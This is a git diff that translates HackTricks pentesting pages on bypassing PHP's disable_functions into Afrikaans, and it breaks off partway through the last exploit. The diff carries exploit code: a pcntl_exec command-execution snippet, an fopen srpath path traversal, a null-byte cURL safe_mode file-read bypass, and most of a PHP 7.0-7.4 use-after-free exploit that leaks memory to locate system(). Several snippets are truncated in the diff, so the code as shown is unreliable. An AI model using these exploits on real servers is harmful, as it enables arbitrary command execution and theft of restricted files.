-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
 # PHP 4 >= 4.2.0, PHP 5 pcntl\_exec
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
-
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
 
 out";
-    pcntl_exec("/bin/bash", $cmd);
-    echo file_get_contents("out");        
+$cmd = $cmd."&pkill -9 bash >out";
+pcntl_exec("/bin/bash", $cmd);
+echo file_get_contents("out");
 } else {
-        echo '不支持pcntl扩展';
+echo '不支持pcntl扩展';
 }
 ?>
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
index 2d914126a..17091744f 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
@@ -1,42 +1,34 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
 # PHP 5.2 - FOpen Exploit
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
-
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
 php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md
index d31adb463..5b70b383c 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md
@@ -1,24 +1,21 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
 # PHP 5.2.3 - Win32std ext Protections Bypass
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
-
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```php
 
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md
index a67b874b9..96e017f93 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md
@@ -1,50 +1,42 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
-# PHP 5.2.4 and 5.2.5 PHP cURL
-
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
+# PHP 5.2.4 en 5.2.5 PHP cURL
 
+Vanaf [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
 ```text
 source: http://www.securityfocus.com/bid/27413/info
- 
+
 PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
- 
+
 Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
- 
-The issue affects PHP 5.2.5 and 5.2.4. 
- 
+
+The issue affects PHP 5.2.5 and 5.2.4.
+
 var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
index 600730159..aecd3baf2 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
@@ -1,28 +1,27 @@
-# disable\_functions bypass - PHP 7.0-7.4 (\*nix only)
+# disable\_functions omseil - PHP 7.0-7.4 (\*nix slegs)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
-## PHP 7.0-7.4 (\*nix only)
-
-From [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)
+## PHP 7.0-7.4 (\*nix slegs)
 
+Vanaf [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)
 ```php
 a);
-            $backtrace = (new Exception)->getTrace(); # ;)
-            if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
-                $backtrace = debug_backtrace();
-            }
-        }
-    }
+class Vuln {
+public $a;
+public function __destruct() {
+global $backtrace;
+unset($this->a);
+$backtrace = (new Exception)->getTrace(); # ;)
+if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
+$backtrace = debug_backtrace();
+}
+}
+}
 
-    class Helper {
-        public $a, $b, $c, $d;
-    }
+class Helper {
+public $a, $b, $c, $d;
+}
 
-    function str2ptr(&$str, $p = 0, $s = 8) {
-        $address = 0;
-        for($j = $s-1; $j >= 0; $j--) {
-            $address <<= 8;
-            $address |= ord($str[$p+$j]);
-        }
-        return $address;
-    }
+function str2ptr(&$str, $p = 0, $s = 8) {
+$address = 0;
+for($j = $s-1; $j >= 0; $j--) {
+$address <<= 8;
+$address |= ord($str[$p+$j]);
+}
+return $address;
+}
 
-    function ptr2str($ptr, $m = 8) {
-        $out = "";
-        for ($i=0; $i < $m; $i++) {
-            $out .= chr($ptr & 0xff);
-            $ptr >>= 8;
-        }
-        return $out;
-    }
+function ptr2str($ptr, $m = 8) {
+$out = "";
+for ($i=0; $i < $m; $i++) {
+$out .= chr($ptr & 0xff);
+$ptr >>= 8;
+}
+return $out;
+}
 
-    function write(&$str, $p, $v, $n = 8) {
-        $i = 0;
-        for($i = 0; $i < $n; $i++) {
-            $str[$p + $i] = chr($v & 0xff);
-            $v >>= 8;
-        }
-    }
+function write(&$str, $p, $v, $n = 8) {
+$i = 0;
+for($i = 0; $i < $n; $i++) {
+$str[$p + $i] = chr($v & 0xff);
+$v >>= 8;
+}
+}
 
-    function leak($addr, $p = 0, $s = 8) {
-        global $abc, $helper;
-        write($abc, 0x68, $addr + $p - 0x10);
-        $leak = strlen($helper->a);
-        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
-        return $leak;
-    }
+function leak($addr, $p = 0, $s = 8) {
+global $abc, $helper;
+write($abc, 0x68, $addr + $p - 0x10);
+$leak = strlen($helper->a);
+if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
+return $leak;
+}
 
-    function parse_elf($base) {
-        $e_type = leak($base, 0x10, 2);
+function parse_elf($base) {
+$e_type = leak($base, 0x10, 2);
 
-        $e_phoff = leak($base, 0x20);
-        $e_phentsize = leak($base, 0x36, 2);
-        $e_phnum = leak($base, 0x38, 2);
+$e_phoff = leak($base, 0x20);
+$e_phentsize = leak($base, 0x36, 2);
+$e_phnum = leak($base, 0x38, 2);
 
-        for($i = 0; $i < $e_phnum; $i++) {
-            $header = $base + $e_phoff + $i * $e_phentsize;
-            $p_type  = leak($header, 0, 4);
-            $p_flags = leak($header, 4, 4);
-            $p_vaddr = leak($header, 0x10);
-            $p_memsz = leak($header, 0x28);
+for($i = 0; $i < $e_phnum; $i++) {
+$header = $base + $e_phoff + $i * $e_phentsize;
+$p_type  = leak($header, 0, 4);
+$p_flags = leak($header, 4, 4);
+$p_vaddr = leak($header, 0x10);
+$p_memsz = leak($header, 0x28);
 
-            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
-                # handle pie
-                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
-                $data_size = $p_memsz;
-            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
-                $text_size = $p_memsz;
-            }
-        }
+if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
+# handle pie
+$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
+$data_size = $p_memsz;
+} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
+$text_size = $p_memsz;
+}
+}
 
-        if(!$data_addr || !$text_size || !$data_size)
-            return false;
+if(!$data_addr || !$text_size || !$data_size)
+return false;
 
-        return [$data_addr, $text_size, $data_size];
-    }
+return [$data_addr, $text_size, $data_size];
+}
 
-    function get_basic_funcs($base, $elf) {
-        list($data_addr, $text_size, $data_size) = $elf;
-        for($i = 0; $i < $data_size / 8; $i++) {
-            $leak = leak($data_addr, $i * 8);
-            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
-                $deref = leak($leak);
-                # 'constant' constant check
-                if($deref != 0x746e6174736e6f63)
-                    continue;
-            } else continue;
+function get_basic_funcs($base, $elf) {
+list($data_addr, $text_size, $data_size) = $elf;
+for($i = 0; $i < $data_size / 8; $i++) {
+$leak = leak($data_addr, $i * 8);
+if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
+$deref = leak($leak);
+# 'constant' constant check
+if($deref != 0x746e6174736e6f63)
+continue;
+} else continue;
 
-            $leak = leak($data_addr, ($i + 4) * 8);
-            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
-                $deref = leak($leak);
-                # 'bin2hex' constant check
-                if($deref != 0x786568326e6962)
-                    continue;
-            } else continue;
+$leak = leak($data_addr, ($i + 4) * 8);
+if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
+$deref = leak($leak);
+# 'bin2hex' constant check
+if($deref != 0x786568326e6962)
+continue;
+} else continue;
 
-            return $data_addr + $i * 8;
-        }
-    }
+return $data_addr + $i * 8;
+}
+}
 
-    function get_binary_base($binary_leak) {
-        $base = 0;
-        $start = $binary_leak & 0xfffffffffffff000;
-        for($i = 0; $i < 0x1000; $i++) {
-            $addr = $start - 0x1000 * $i;
-            $leak = leak($addr, 0, 7);
-            if($leak == 0x10102464c457f) { # ELF header
-                return $addr;
-            }
-        }
-    }
+function get_binary_base($binary_leak) {
+$base = 0;
+$start = $binary_leak & 0xfffffffffffff000;
+for($i = 0; $i < 0x1000; $i++) {
+$addr = $start - 0x1000 * $i;
+$leak = leak($addr, 0, 7);
+if($leak == 0x10102464c457f) { # ELF header
+return $addr;
+}
+}
+}
 
-    function get_system($basic_funcs) {
-        $addr = $basic_funcs;
-        do {
-            $f_entry = leak($addr);
-            $f_name = leak($f_entry, 0, 6);
+function get_system($basic_funcs) {
+$addr = $basic_funcs;
+do {
+$f_entry = leak($addr);
+$f_name = leak($f_entry, 0, 6);
 
-            if($f_name == 0x6d6574737973) { # system
-                return leak($addr + 8);
-            }
-            $addr += 0x20;
-        } while($f_entry != 0);
-        return false;
-    }
+if($f_name == 0x6d6574737973) { # system
+return leak($addr + 8);
+}
+$addr += 0x20;
+} while($f_entry != 0);
+return false;
+}
 
-    function trigger_uaf($arg) {
-        # str_shuffle prevents opcache string interning
-        $arg = str_shuffle(str_repeat('A', 79));
-        $vuln = new Vuln();
-        $vuln->a = $arg;
-    }
+function trigger_uaf($arg) {
+# str_shuffle prevents opcache string interning
+$arg = str_shuffle(str_repeat('A', 79));
+$vuln = new Vuln();
+$vuln->a = $arg;
+}
 
-    if(stristr(PHP_OS, 'WIN')) {
-        die('This PoC is for *nix systems only.');
-    }
+if(stristr(PHP_OS, 'WIN')) {
+die('This PoC is for *nix systems only.');
+}
 
-    $n_alloc = 10; # increase this value if UAF fails
-    $contiguous = [];
-    for($i = 0; $i < $n_alloc; $i++)
-        $contiguous[] = str_shuffle(str_repeat('A', 79));
+$n_alloc = 10; # increase this value if UAF fails
+$contiguous = [];
+for($i = 0; $i < $n_alloc; $i++)
+$contiguous[] = str_shuffle(str_repeat('A', 79));
 
-    trigger_uaf('x');
-    $abc = $backtrace[1]['args'][0];
+trigger_uaf('x');
+$abc = $backtrace[1]['args'][0];
 
-    $helper = new Helper;
-    $helper->b = function ($x) { };
+$helper = new Helper;
+$helper->b = function ($x) { };
 
